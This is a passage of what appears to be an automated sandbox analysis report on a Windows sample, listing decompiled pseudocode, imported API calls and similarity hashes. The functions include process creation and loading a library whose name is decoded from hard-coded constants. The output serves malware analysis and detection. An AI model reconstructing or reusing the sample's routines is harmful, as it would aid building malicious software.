0x002b034d
0x002b0352
0x002b0353

APIs

memset.NTDLL ref: 002B0304
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 002B0331
CloseHandle.KERNEL32(?), ref: 002B033E
CloseHandle.KERNEL32(?), ref: 002B0347

Strings

D, xrefs: 002B030D

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: CloseHandle$CreateProcessmemset
String ID: D
API String ID: 657545203-2746444292
Opcode ID: 951d10915f8a362dd41e3800d1a7d1816916827b2a0ea78b5c7e2efc13516dbf
Instruction ID: 513616a8fec2eafe8766346fd0fbe7fee926043ba34d03119ad5c6e3ffb814ed
Opcode Fuzzy Hash: 951d10915f8a362dd41e3800d1a7d1816916827b2a0ea78b5c7e2efc13516dbf
Instruction Fuzzy Hash: F2E0BF7280411DDFDB01AFD0EC8DBEE7BB9BF04705F544665E215EA061DB358914CB61

Uniqueness

Uniqueness Score: 0.08%

Function 002AFF8F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 23
processCOMMON

C-Code - Quality: 33%

			E002AFF8F() {
				int _t9;
				void* _t11;

				memset();
				 *(_t11 - 0x58) = 0x44;
				_t9 = CreateProcessW(0x2b7ee0, 0, 0, 0, 0, 0, 0, 0, _t11 - 0x58, _t11 - 0x10);
				if(_t9 != 0) {
					CloseHandle( *(_t11 - 0x10));
					_t9 = CloseHandle( *(_t11 - 0xc));
				}
				goto 0x5a1ef4;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				return _t9;
			}

0x002aff8f
0x002aff98
0x002affba
0x002affc2
0x002affc7
0x002affd0
0x002affd0
0x002affd6
0x002affdb
0x002affdc
0x002affdd
0x002affde
0x002affdf

APIs

memset.NTDLL ref: 002AFF8F
CreateProcessW.KERNEL32(002B7EE0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 002AFFBA
CloseHandle.KERNEL32(?), ref: 002AFFC7
CloseHandle.KERNEL32(?), ref: 002AFFD0

Strings

D, xrefs: 002AFF98

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: CloseHandle$CreateProcessmemset
String ID: D
API String ID: 657545203-2746444292
Opcode ID: 5291e1457ae77a2ae121f14ce59b50db31f49835c6ff451931525d453c9a3ed3
Instruction ID: a85a090ded9be233cb5c98b150db6ebb3a45a8db3dedde89cdc0ed0694b7d12f
Opcode Fuzzy Hash: 5291e1457ae77a2ae121f14ce59b50db31f49835c6ff451931525d453c9a3ed3
Instruction Fuzzy Hash: 7BE0B672904549EFDB00AFD0EC8CBAD7BB8BB01745F108525E612A50A1DB7099148B15

Uniqueness

Uniqueness Score: 0.08%

Function 002AF71E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 21
memoryUNIQUE

C-Code - Quality: 33%

			E002AF71E(void* __esi) {
				void* _t2;
				void* _t9;
				void* _t11;

				memset();
				_t2 = L002A1D00(0x2b3ee0, 0x1b8, _t9);
				_t11 = _t2;
				 *0x2b59dc(0x2b7ee0, 0x104, _t11, 0x2b81f0, 0x2b7cd0, 0x67165621);
				return HeapFree(GetProcessHeap(), 0, _t11);
			}

0x002af720
0x002af735
0x002af744
0x002af751
0x002af76b

APIs

memset.NTDLL ref: 002AF720
_snwprintf.NTDLL ref: 002AF751
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002AF75D
HeapFree.KERNEL32(00000000), ref: 002AF764

Strings

>+, xrefs: 002AF730

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: Heap$FreeProcess_snwprintfmemset
String ID: >+
API String ID: 3735989449-155743905
Opcode ID: 6c021e10e65a4329a6f29b0a27cc7a1d8509ce0a2bc90f80f60b0dd98a391b67
Instruction ID: 1abc636813c0c62f05038661723a465f5cad82ae60c6c885369d4215a557189b
Opcode Fuzzy Hash: 6c021e10e65a4329a6f29b0a27cc7a1d8509ce0a2bc90f80f60b0dd98a391b67
Instruction Fuzzy Hash: A1E0C230269A20BBD28027A6BC0EBCE3909DF46BE2F000101F50A6D1C1CBA158B0C7A1

Uniqueness

Uniqueness Score: 100.00%

Function 002A2217, Relevance: 7.6, APIs: 5, Instructions: 60memoryCOMMON

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 002A2223
RtlAllocateHeap.NTDLL(00000000), ref: 002A222A
memcpy.NTDLL(?,?,?,?,?,?), ref: 002A2264
GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 002A22DA
HeapFree.KERNEL32(00000000), ref: 002A22E1

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: Heap$Process$AllocateFreememcpy
String ID:
API String ID: 461410222-0
Opcode ID: 1cd65700e15fc760c22755243b3a8b3f1ab9a5ebc3546119f6a86c696bca99d1
Instruction ID: fb49ebf0a86975fc6305aa8112db0de39ba6930f5d7a3ccdb4d19237e2c1cda0
Opcode Fuzzy Hash: 1cd65700e15fc760c22755243b3a8b3f1ab9a5ebc3546119f6a86c696bca99d1
Instruction Fuzzy Hash: 74112971900216EFCB119FA4ED4CBAEBFB8FF04341F004265FA08DA161DB718920DB90

Uniqueness

Uniqueness Score: 0.08%

Function 002A6A24, Relevance: 7.5, APIs: 6, Instructions: 45
memoryCOMMON

C-Code - Quality: 61%

			E002A6A24(void* __eax, intOrPtr* __ebx, void* __edi) {
				void _t38;
				intOrPtr _t41;
				intOrPtr* _t42;
				void* _t47;
				void* _t51;
				void* _t54;
				void* _t57;
				void* _t60;

				_t54 = __edi;
				_t42 = __ebx;
				if(L002A1740(_t60 - 0xb0,  *((intOrPtr*)(__eax + 4))) != 0) {
					_push(_t60 - 0x10);
					if(L002A2300(_t54, _t60 - 0x24, _t54) != 0) {
						_t47 =  *(_t60 - 0x10);
						_t51 = _t42 + 4;
						_t38 =  *_t47;
						 *_t51 = _t38;
						if(_t38 < 0x4000000) {
							_push(_t51);
							_t41 = L002A67D0(_t47 + 4,  *((intOrPtr*)(_t60 - 0xc)) - 4, _t54);
							_t47 =  *(_t60 - 0x10);
							 *_t42 = _t41;
						}
						HeapFree(GetProcessHeap(), 0, _t47);
					}
					HeapFree(GetProcessHeap(), ??, ??);
				}
				HeapFree(GetProcessHeap(), 0, _t57);
				HeapFree(GetProcessHeap(), 0,  *(_t60 - 8));
				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), ??, ??);
				if( *_t42 == 0) {
					 *(_t54 + 0x1c) =  *(_t54 + 0x1c) + 1;
					return 0 |  *_t42 != 0x00000000;
				} else {
					 *((intOrPtr*)(_t54 + 0x20)) =  *((intOrPtr*)(_t54 + 0x20)) + 1;
					 *(_t54 + 0x1c) = 0;
					return 0 |  *_t42 != 0x00000000;
				}
			}

0x002a6a24
0x002a6a24
0x002a6a38
0x002a6a3f
0x002a6a4d
0x002a6a4f
0x002a6a52
0x002a6a55
0x002a6a57
0x002a6a5e
0x002a6a60
0x002a6a6a
0x002a6a6f
0x002a6a75
0x002a6a75
0x002a6a81
0x002a6a81
0x002a6a93
0x002a6a93
0x002a6aa3
0x002a6ab5
0x002a6ac7
0x002a6ad9
0x002a6ae2
0x002a6afc
0x002a6b0c
0x002a6ae4
0x002a6ae4
0x002a6ae9
0x002a6afb
0x002a6afb

APIs

GetProcessHeap.KERNEL32(00000000,?), ref: 002A6A7A
HeapFree.KERNEL32(00000000), ref: 002A6A81
GetProcessHeap.KERNEL32(00000000), ref: 002A6A9C
HeapFree.KERNEL32(00000000), ref: 002A6AA3
GetProcessHeap.KERNEL32(00000000,?), ref: 002A6AAE
HeapFree.KERNEL32(00000000), ref: 002A6AB5

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: a433c73eb6ce869d03788733cdcf02ac6cc1917a85895f296ca7115ca36313b7
Instruction ID: 2b8223d89c8248ccc56164cdd0768f5cab37285e13310c7924dc6fe24d1ab0ff
Opcode Fuzzy Hash: a433c73eb6ce869d03788733cdcf02ac6cc1917a85895f296ca7115ca36313b7
Instruction Fuzzy Hash: E4019EB0910615DBDB04AFA0EC4DBAEBB75FF05306F088594E406EF1A2EB71A914CB61

Uniqueness

Uniqueness Score: 0.01%

Function 002A2597, Relevance: 7.5, APIs: 5, Instructions: 36memoryCOMMON

APIs

WideCharToMultiByte.KERNEL32 ref: 002A2597
GetProcessHeap.KERNEL32 ref: 002A25B6
HeapFree.KERNEL32(00000000), ref: 002A25BD
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A25D5
HeapFree.KERNEL32(00000000), ref: 002A25DC

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: Heap$FreeProcess$ByteCharMultiWide
String ID:
API String ID: 2131386014-0
Opcode ID: 9a71a777046b021c9330216b3c1be81f281d8e51a02ef1040334b298204843b7
Instruction ID: bc6d6ac2a899a30024578219a32d363cc487939ac4b0431516b403f6dd29ba60
Opcode Fuzzy Hash: 9a71a777046b021c9330216b3c1be81f281d8e51a02ef1040334b298204843b7
Instruction Fuzzy Hash: F1F0B431A25226CFCB189FB8EC5C72E3B74FF05712B500569E802EF250DB318C148B60

Uniqueness

Uniqueness Score: 3.75%

Function 002A119A, Relevance: 7.5, APIs: 5, Instructions: 35
memoryCOMMON

C-Code - Quality: 19%

			E002A119A(void* __edi) {
				void* _t19;
				void* _t24;
				void* _t26;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t34;

				_t29 = __edi;
				_t31 = L002A1D00(_t26, 0xcc, __edi);
				 *0x2b59dc(_t34 - 0x98, 0x40, _t31,  *((intOrPtr*)(_t34 - 8)));
				HeapFree(GetProcessHeap(), 0, _t31);
				_t32 = CreateEventW(0, 1, 0, _t34 - 0x98);
				if(_t32 != 0) {
					goto 0x5a007f;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					GetModuleFileNameW();
					_push(_t34 - 0x18);
					_push(0x80);
					_t19 = L002A1E80(_t32); // executed
					if(_t19 != 0) {
						WaitForSingleObject(_t32, 0xffffffff);
						CloseHandle( *(_t34 - 0x18));
						CloseHandle( *(_t34 - 0x14));
					}
					CloseHandle(_t32);
				}
				CloseHandle(_t24);
				return _t29;
			}

0x002a119a
0x002a11a4
0x002a11b3
0x002a11c6
0x002a11df
0x002a11e3
0x002a11e5
0x002a11ea
0x002a11eb
0x002a11ec
0x002a11ed
0x002a11ee
0x002a11ef
0x002a11f0
0x002a11f1
0x002a11f2
0x002a11f3
0x002a11fc
0x002a11fd
0x002a1208
0x002a1212
0x002a1217
0x002a1220
0x002a1229
0x002a1229
0x002a1230
0x002a1230
0x002a1237
0x002a1245

APIs

_snwprintf.NTDLL ref: 002A11B3
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A11BF
HeapFree.KERNEL32(00000000), ref: 002A11C6
CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 002A11D9
CloseHandle.KERNEL32 ref: 002A1237

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: Heap$CloseCreateEventFreeHandleProcess_snwprintf
String ID:
API String ID: 347592444-0
Opcode ID: 32d0855180161fb3d7453c8bc955b328ecf32a30fc62d9a7acdb5cdbf1b4926f
Instruction ID: 6d8d4f391d6423a9b44704468ac590b77ac545e4a84f5aaecedd2ec5c810bffd
Opcode Fuzzy Hash: 32d0855180161fb3d7453c8bc955b328ecf32a30fc62d9a7acdb5cdbf1b4926f
Instruction Fuzzy Hash: 65F02E72A1152467D7202BF4BC0DBDE7B28EB01712F000192FE0DEA182D971852487A1

Uniqueness

Uniqueness Score: 3.75%

Function 002A6A8C, Relevance: 7.5, APIs: 6, Instructions: 14
memoryCOMMON

C-Code - Quality: 50%

			E002A6A8C(intOrPtr* __ebx, void* __edi) {
				void* _t31;
				void* _t34;

				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), 0, _t31);
				HeapFree(GetProcessHeap(), 0,  *(_t34 - 8));
				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), ??, ??);
				if( *__ebx == 0) {
					 *(__edi + 0x1c) =  *(__edi + 0x1c) + 1;
					return 0 |  *__ebx != 0x00000000;
				} else {
					 *((intOrPtr*)(__edi + 0x20)) =  *((intOrPtr*)(__edi + 0x20)) + 1;
					 *(__edi + 0x1c) = 0;
					return 0 |  *__ebx != 0x00000000;
				}
			}

0x002a6a93
0x002a6aa3
0x002a6ab5
0x002a6ac7
0x002a6ad9
0x002a6ae2
0x002a6afc
0x002a6b0c
0x002a6ae4
0x002a6ae4
0x002a6ae9
0x002a6afb
0x002a6afb

APIs

GetProcessHeap.KERNEL32 ref: 002A6A8C
HeapFree.KERNEL32(00000000), ref: 002A6A93
GetProcessHeap.KERNEL32(00000000), ref: 002A6A9C
HeapFree.KERNEL32(00000000), ref: 002A6AA3
GetProcessHeap.KERNEL32(00000000,?), ref: 002A6AAE
HeapFree.KERNEL32(00000000), ref: 002A6AB5

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 585fe069b1c2c0212c72675b7ecf3eb1ed0fbd14bafb0efc8cc2d510cd4784d6
Instruction ID: 90157b8fc3656b9cb9ea0ced2173d3298b257b467ec235cc8ad5b5905a7d128d
Opcode Fuzzy Hash: 585fe069b1c2c0212c72675b7ecf3eb1ed0fbd14bafb0efc8cc2d510cd4784d6
Instruction Fuzzy Hash: DDD0C272559B20ABDB452BF4BD0DB5E3E38BB09703F440644F60ADE0A1CAB64500AB21

Uniqueness

Uniqueness Score: 0.01%

Function 002A8311, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
memorylibraryUNIQUE

C-Code - Quality: 70%

			E002A8311(void* __esi, void* __eflags) {
				int _t31;
				void* _t33;
				void* _t36;
				void* _t37;
				void* _t39;
				void* _t40;
				void* _t41;

				 *((intOrPtr*)(_t41 - 0x6c)) = 0x57762683;
				 *((intOrPtr*)(_t41 - 0x68)) = 0x592baf94;
				 *((intOrPtr*)(_t41 - 0x64)) = 0xad8fd844;
				 *((intOrPtr*)(_t41 - 0x60)) = 0xba8e947f;
				 *((intOrPtr*)(_t41 - 0x5c)) = 0x75eb77e0;
				 *((intOrPtr*)(_t41 - 0x58)) = 0x6b9a4e89;
				 *((intOrPtr*)(_t41 - 0x54)) = 0x8f463d09;
				 *((intOrPtr*)(_t41 - 0x50)) = 0x445c08e3;
				 *((intOrPtr*)(_t41 - 0x4c)) = 0x9644cebc;
				 *((intOrPtr*)(_t41 - 0x48)) = 0x500c095b;
				 *((intOrPtr*)(_t41 - 0x44)) = 0x1dbceffb;
				 *((intOrPtr*)(_t41 - 0x40)) = 0x10966022;
				 *((intOrPtr*)(_t41 - 0x3c)) = 0xced97c24;
				 *((intOrPtr*)(_t41 - 0x38)) = 0xd2b6aaa3;
				 *((intOrPtr*)(_t41 - 0x34)) = 0xa7ede2e6;
				 *((intOrPtr*)(_t41 - 0x30)) = 0xbfd00c40;
				 *((intOrPtr*)(_t41 - 0x2c)) = 0x506bf409;
				 *((intOrPtr*)(_t41 - 0x28)) = 0x51769f7e;
				 *((intOrPtr*)(_t41 - 0x24)) = 0x4a3b59bb;
				 *((intOrPtr*)(_t41 - 0x20)) = 0x7e8ef40c;
				 *((intOrPtr*)(_t41 - 0x1c)) = 0xc05c293d;
				 *((intOrPtr*)(_t41 - 0x18)) = 0xfd52ddd5;
				 *((intOrPtr*)(_t41 - 0x14)) = 0xca5a685e;
				 *((intOrPtr*)(_t41 - 0x10)) = 0x490ba5f1;
				 *((intOrPtr*)(_t41 - 0xc)) = 0xc8f2a124;
				 *((intOrPtr*)(_t41 - 8)) = 0xf2d76c27;
				 *((intOrPtr*)(_t41 - 4)) = 0x12571069;
				_t39 = L002A1D00(0x2b2cf0, _t36, _t37);
				 *0x2b7c7c = LoadLibraryW(_t39);
				_t31 = HeapFree(GetProcessHeap(), 0, _t39);
				_t35 =  *0x2b7c7c;
				_pop(_t40);
				if( *0x2b7c7c != 0) {
					goto 0x5a1714;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return L002A1480(_t33, _t35, _t36, _t37, _t40);
				} else {
					goto 0x5a1701;
					return _t31;
				}
			}

0x002a8311
0x002a831d
0x002a8324
0x002a832b
0x002a8332
0x002a8339
0x002a8340
0x002a8347
0x002a834e
0x002a8355
0x002a835c
0x002a8363
0x002a836a
0x002a8371
0x002a8378
0x002a837f
0x002a8386
0x002a838d
0x002a8394
0x002a839b
0x002a83a2
0x002a83a9
0x002a83b0
0x002a83b7
0x002a83be
0x002a83c5
0x002a83cc
0x002a83db
0x002a83e7
0x002a83f3
0x002a83f9
0x002a83ff
0x002a8402
0x002a840a
0x002a840f
0x002a8410
0x002a8411
0x002a8412
0x002a8413
0x002a8414
0x002a8415
0x002a8416
0x002a8417
0x002a8418
0x002a8424
0x002a8404
0x002a8404
0x002a8409
0x002a8409

APIs

LoadLibraryW.KERNEL32(00000000), ref: 002A83DE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A83EC
HeapFree.KERNEL32(00000000), ref: 002A83F3

Strings

wu, xrefs: 002A8332

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: Heap$FreeLibraryLoadProcess
String ID: wu
API String ID: 872250060-894654108
Opcode ID: 42d9b1478b7441aeaa900956be81bf46db1f5698dac1e35f9a4d12238a5b6e29
Instruction ID: 5b58d3230e26525a83e8bf9a81532f8a42c2a0edd4b2aadca5ae676a4a6d3f03
Opcode Fuzzy Hash: 42d9b1478b7441aeaa900956be81bf46db1f5698dac1e35f9a4d12238a5b6e29
Instruction Fuzzy Hash: 3321BBB0C15399DBDF20DFD2A9481DDBEB4BB05700F244549E6162F215D7B94A02CF95

Uniqueness

Uniqueness Score: 100.00%

Function 002AFD10, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37memoryUNIQUE

APIs

_snwprintf.NTDLL ref: 002AFD36
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002AFD42
HeapFree.KERNEL32(00000000), ref: 002AFD49

Strings

=+, xrefs: 002AFD12

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: Heap$FreeProcess_snwprintf
String ID: =+
API String ID: 1826127215-22556172
Opcode ID: 95a5453ae53199a0a053c2f6b0298f4b6e12170b756f239ed2b7143ed9bbc1eb
Instruction ID: aca8f3d3d79daa287947d9c7ede5ef512060ffb2927a4815412110e84fdd9303
Opcode Fuzzy Hash: 95a5453ae53199a0a053c2f6b0298f4b6e12170b756f239ed2b7143ed9bbc1eb
Instruction Fuzzy Hash: 88F0BB3251091067C71167A8BC4CBDF7B6CEB4D762F010756F909D6152DF7148508B90

Uniqueness

Uniqueness Score: 100.00%

Function 002AF69E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20
memoryUNIQUE

C-Code - Quality: 50%

			E002AF69E(void* __esi) {
				void* _t2;
				void* _t8;
				void* _t10;

				 *0x2b5a94();
				_t2 = L002A1D00(0x2b4660, 0x1cc, _t8);
				_t10 = _t2;
				 *0x2b59dc(0x2b81f0, 0x104, _t10, 0x2b81f0, 0x2b7cd0, 0x67165621);
				return HeapFree(GetProcessHeap(), 0, _t10);
			}

0x002af69e
0x002af6b3
0x002af6c2
0x002af6cf
0x002af6e9

APIs

_snwprintf.NTDLL ref: 002AF6CF
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002AF6DB
HeapFree.KERNEL32(00000000), ref: 002AF6E2

Strings

`F+, xrefs: 002AF6AE

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: Heap$FreeProcess_snwprintf
String ID: `F+
API String ID: 1826127215-3171484657
Opcode ID: 99bf24acde6fdacb4ff4d8d2d47b0e177a25598629ec5e20fb2e044b951981d8
Instruction ID: 4aa315e0e6b58017e19ad522af3f5689d3b1b50e3e66961ff7979ec470f19b0b
Opcode Fuzzy Hash: 99bf24acde6fdacb4ff4d8d2d47b0e177a25598629ec5e20fb2e044b951981d8
Instruction Fuzzy Hash: A1E012316A662077D21037A87C4EFDA3E1CEB467E2F004251FA0E6D1D2CAA1087186A5

Uniqueness

Uniqueness Score: 100.00%

Function 002A1679, Relevance: 6.1, APIs: 4, Instructions: 77
memoryCOMMON

C-Code - Quality: 53%

			E002A1679(intOrPtr __ecx, void** __edx) {
				signed int _t19;
				void _t24;
				long _t33;
				void* _t39;
				void** _t40;
				void _t42;
				long _t45;
				void* _t48;

				 *(_t48 - 0x10) = __edx;
				 *((intOrPtr*)(_t48 - 0xc)) = __ecx;
				 *(_t48 - 8) = 4;
				_t19 =  *0x2b737c(__ecx, 0x20000005, _t48 - 4, _t48 - 8, 0);
				_t45 = 0;
				_t42 = 0;
				asm("sbb ebx, ebx");
				_t33 =  ~_t19 &  *(_t48 - 4);
				if(_t33 <= 0) {
					L10:
					return _t42;
				} else {
					_t39 = RtlAllocateHeap(GetProcessHeap(), 8, _t33);
					 *(_t48 - 4) = _t39;
					if(_t39 == 0) {
						goto L10;
					} else {
						 *(_t48 - 8) = 0;
						if(_t33 == 0) {
							L8:
							_t24 = HeapFree(GetProcessHeap(), 0, _t39);
							if(_t42 != 0) {
								goto L9;
							}
							goto L10;
						} else {
							while(1) {
								_t24 =  *0x2b71a4( *((intOrPtr*)(_t48 - 0xc)), _t39 + _t45, _t33 - _t45, _t48 - 8);
								_t42 = _t24;
								if(_t42 == 0) {
									break;
								}
								_t39 =  *(_t48 - 8);
								if(_t39 == 0) {
									L9:
									goto 0x5a02e4;
									asm("int3");
									 *_t39 = _t24;
									 *(_t39 + 4) = _t45;
									goto L10;
								} else {
									_t45 = _t39 + _t45;
									_t39 =  *(_t48 - 4);
									if(_t45 < _t33) {
										continue;
									} else {
										_t40 =  *(_t48 - 0x10);
										 *_t40 = _t39;
										_t40[1] = _t45;
										return _t42;
									}
								}
								goto L11;
							}
							_t39 =  *(_t48 - 4);
							goto L8;
						}
					}
				}
				L11:
			}

0x002a167b
0x002a1683
0x002a168a
0x002a1698
0x002a16a0
0x002a16a7
0x002a16a9
0x002a16ab
0x002a16ae
0x002a1735
0x002a173d
0x002a16b4
0x002a16c4
0x002a16c6
0x002a16cb
0x00000000
0x002a16cd
0x002a16cd
0x002a16d2
0x002a1716
0x002a1720
0x002a1728
0x00000000
0x00000000
0x00000000
0x002a16d4
0x002a16d4
0x002a16e4
0x002a16ea
0x002a16ee
0x00000000
0x00000000
0x002a16f0
0x002a16f5
0x002a172a
0x002a172a
0x002a172f
0x002a1730
0x002a1732
0x00000000
0x002a16f7
0x002a16f7
0x002a16f9
0x002a16fe
0x00000000
0x002a1700
0x002a1702
0x002a1705
0x002a170a
0x002a1712
0x002a1712
0x002a16fe
0x00000000
0x002a16f5
0x002a1713
0x00000000
0x002a1713
0x002a16d2
0x002a16cb
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,?,?,20000005,?,?,00000000), ref: 002A16B7
RtlAllocateHeap.NTDLL(00000000,?,20000005), ref: 002A16BE
GetProcessHeap.KERNEL32(00000000,00000000,?,20000005,?,?,00000000), ref: 002A1719
HeapFree.KERNEL32(00000000,?,20000005), ref: 002A1720

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: 75d30ad4235f66f7c84382a6d3088e7d7217fa92b7d84d5e8e2106fb3939030a
Instruction ID: 9834c02b9b27576d57639a249b6787726608d8b9e4625a6ad9c4a51b3863becb
Opcode Fuzzy Hash: 75d30ad4235f66f7c84382a6d3088e7d7217fa92b7d84d5e8e2106fb3939030a
Instruction Fuzzy Hash: 05218176B10219ABDB14CF99EC88BADFBB9EF88311F1402ADE909D7240DB714D148B50

Uniqueness

Uniqueness Score: 0.01%

Function 002ACF86, Relevance: 6.0, APIs: 4, Instructions: 37synchronizationCOMMON

APIs

GetTickCount.KERNEL32 ref: 002ACF86
GetTickCount.KERNEL32(?,00000000), ref: 002ACF94
GetTickCount.KERNEL32(?,00000000), ref: 002ACFA5
WaitForSingleObject.KERNEL32(00000000), ref: 002ACFF1

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: CountTick$ObjectSingleWait
String ID:
API String ID: 2051767920-0
Opcode ID: b7a5b590a43678e233f4de3711cf235259e3e855e6d6d6806efcc789a98735e9
Instruction ID: 0afd1bbc1e8e2ab6400a94f606fce6103bb84731306a0bd419034f25277d7101
Opcode Fuzzy Hash: b7a5b590a43678e233f4de3711cf235259e3e855e6d6d6806efcc789a98735e9
Instruction Fuzzy Hash: 840149729006109FE720AFB0FC5EB6E3F79FB48706F144A25F206EA1A1DB788406DB54

Uniqueness

Uniqueness Score: 0.03%

Function 002A67DC, Relevance: 6.0, APIs: 4, Instructions: 32
